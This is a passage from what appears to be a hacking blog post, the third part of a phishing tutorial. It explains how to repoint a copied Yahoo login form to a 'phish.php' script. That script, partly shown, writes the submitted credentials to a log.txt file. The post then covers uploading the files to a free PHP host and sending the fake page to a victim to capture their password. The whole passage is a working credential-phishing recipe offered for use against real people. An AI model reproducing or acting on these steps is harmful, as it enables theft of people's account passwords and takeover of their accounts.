action=" https://login.yahoo.com/config/login ?"
Once located change action string by phish.php, so that above string should appear as following,
action="phish.php"
Now step number two is to create phish.php file. Open notepad and copy following code in it,
$value) {
fwrite($handle, $variable);
fwrite($handle, "=");
fwrite($handle, $value);
fwrite($handle, "\r\n");
}
fwrite($handle, "\r\n");
fclose($handle);
exit;
?>
Save it as phish.php, now create an empty password log file log.txt. Now sign up for a free webhosting service which supports php from http://www.100best-free-web-space.com/ . Now upload Yahoomail.htm file, php file, password log file and Yahoomail_files folder to that web host. Change permission of log.txt file to777 from settings. Now vector this phished site to victim to get his/her password.
I think three tutorials on Phishing are good enough to understand how to phish websites and hack passwords so in our next post on phishing we will discus how to vector phished sites. Till then, have a nice time, thanks for reading, hackyahoo passwords and keep visiting.
No comments:
Post a Comment